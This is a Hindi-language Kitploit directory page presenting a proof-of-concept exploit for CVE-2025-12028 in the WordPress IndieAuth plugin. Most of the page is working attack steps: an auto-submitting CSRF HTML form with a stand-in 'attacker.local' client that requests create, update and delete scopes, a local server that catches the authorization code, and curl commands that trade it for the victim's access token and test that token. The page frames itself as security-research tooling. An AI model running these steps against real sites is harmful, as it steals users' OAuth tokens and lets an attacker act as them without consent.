Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-12028 — CVE-2025-12028 के लिए अवधारणा-सिद्ध शोषण जो WordPress IndieAuth प्लगइन में CSRF-आधारित OAuth टोकन चोरी का प्रदर्शन करता है, चुराए गए क्रेडेंशियल्स के साथ अनधिकृत API पहुँच सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/jfriedli/cve-2025-12028
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubjfriedli/cve-2025-12028

CVE-2025-12028

CVE-2025-12028 के लिए अवधारणा-सिद्ध शोषण जो WordPress IndieAuth प्लगइन में CSRF-आधारित OAuth टोकन चोरी का प्रदर्शन करता है, चुराए गए क्रेडेंशियल्स के साथ अनधिकृत API पहुँच सक्षम करता है।

रिपॉजिटरी देखें
15 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

1) एक सरल HTTP सर्वर प्रारंभ करें ताकि प्रूफ-ऑफ-कॉन्सेप्ट पेज होस्ट किया जा सके

root@kitploit:~
mkdir -p /tmp/attacker && cd /tmp/attacker
php -S 127.0.0.1:8000

2) निम्नलिखित सामग्री के साथ एक फ़ाइल /tmp/attacker/poc.html बनाएँ

root@kitploit:~
<!doctype html>
<html>
  <body>
    <form id="x" method="post" action="http://localhost/wordpress/wp-login.php?action=indieauth">
      <input name="client_id" value="http://attacker.local/app">
      <input name="redirect_uri" value="http://127.0.0.1:8000/cb">
      <input name="state" value="csrf-12345">
      <input name="response_type" value="code">
      <input name="scope[]" value="create">
      <input name="scope[]" value="update">
      <input name="scope[]" value="delete">
    </form>
    <script>
      document.getElementById('x').submit();
    </script>
  </body>
</html>

3) एक लॉग-इन ब्राउज़र सत्र में PoC को ट्रिगर करें

जबकि इसमें लॉग इन किया गया हो:

root@kitploit:~
http://localhost/wordpress

खोलें:

root@kitploit:~
http://127.0.0.1:8000/poc.html

उसी ब्राउज़र सत्र में।


4) प्राधिकरण रीडायरेक्ट का निरीक्षण करें

ब्राउज़र निम्न कार्य करेगा:

  • IndieAuth एंडपॉइंट पर पीड़ित के कुकीज़ के साथ POST करें
  • एक प्राधिकरण कोड प्राप्त करें
  • इसमें रीडायरेक्ट करें:
root@kitploit:~
http://127.0.0.1:8000/cb?code=...&state=csrf-12345

5) कोड को एक्सेस टोकन के लिए विनिमय करें

root@kitploit:~
curl -sX POST "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -d "grant_type=authorization_code" \
  -d "code=PASTE_CODE_FROM_STEP_4" \
  -d "client_id=http://attacker.local/app" \
  -d "redirect_uri=http://127.0.0.1:8000/cb"

6) टोकन प्रतिक्रिया का निरीक्षण करें

JSON प्रतिक्रिया में निम्नलिखित फ़ील्ड होंगे:

  • access_token
  • scope
  • me
  • (संभवतः) refresh_token

यह टोकन अब प्रदत्त स्कोप के भीतर पीड़ित के रूप में कार्य करने के लिए उपयोग किया जा सकता है।


7) टोकन सत्यापित करें

root@kitploit:~
TOKEN="PASTE_ACCESS_TOKEN"

curl -s "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -H "Authorization: Bearer $TOKEN"
टूल डाउनलोड करें